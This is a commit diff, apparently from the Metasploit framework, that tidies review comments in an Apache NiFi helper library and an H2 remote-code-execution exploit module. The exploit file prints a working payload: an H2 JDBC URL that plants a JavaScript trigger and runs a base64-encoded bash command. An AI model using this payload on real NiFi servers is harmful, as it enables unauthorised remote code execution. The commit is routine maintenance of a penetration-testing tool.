review comments

h00die · Aug 8, 2023 · f125ad8 · f125ad8
1 parent bba8681
commit f125ad8
Show file tree

Hide file tree

Showing 2 changed files with 6 additions and 6 deletions.
diff --git a/lib/msf/core/exploit/remote/http/nifi.rb b/lib/msf/core/exploit/remote/http/nifi.rb
@@ -40,7 +40,7 @@ def get_version
             fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
             fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected Respones Code (response code: #{res.code})") unless res.code == 200
 
-            return Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{js/nf/nf-namespace\.js\?([\d.]*)">}
+            return Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{js/nf/nf-namespace\.js\?([\d.]+)">}
 
             nil
           end
@@ -65,9 +65,8 @@ def check_response(description, response, expected_response_code, item = '')
             return if item.empty?
 
             body = response.get_json_document
-            unless body.key?(item)
-              fail_with(Msf::Module::Failure::UnexpectedReply, "Unable to retrieve #{item} from HTTP response when #{description}")
-            end
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, "Unable to retrieve #{item} from HTTP response when #{description}") unless body.key?(item)
             body[item]
           end
 

diff --git a/modules/exploits/linux/http/apache_nifi_h2_rce.rb b/modules/exploits/linux/http/apache_nifi_h2_rce.rb
@@ -131,9 +131,10 @@ def configure_dbconpool
         'comments' => '',
         'properties' => {
           # https://github.com/apache/nifi/pull/7349/files#diff-66ccc94a6b0dfa29817ded9c18e5a87c4fff9cd38eeedc3f121f6436ba53e6c0R38
-          # we can use a random db name here, the file is created automatically if we write to disk. However, we can be more clean
+          # we can use a random db name here, the file is created automatically if we write to disk. However, we can be cleaner
           # by using mem here instead of file
-          'Database Connection URL' => "jdbc:h2:mem:#{Rex::Text.rand_text_alpha_upper(6..12)};TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",
+          # $$ is used as the code start/stop block.
+          'Database Connection URL' => "jdbc:h2:mem:#{Rex::Text.rand_text_alpha_upper(6..12)};TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$",
           'Database Driver Class Name' => 'org.h2.Driver',
           # This seems to be installed by default, do we need the location?
           'database-driver-locations' => driver,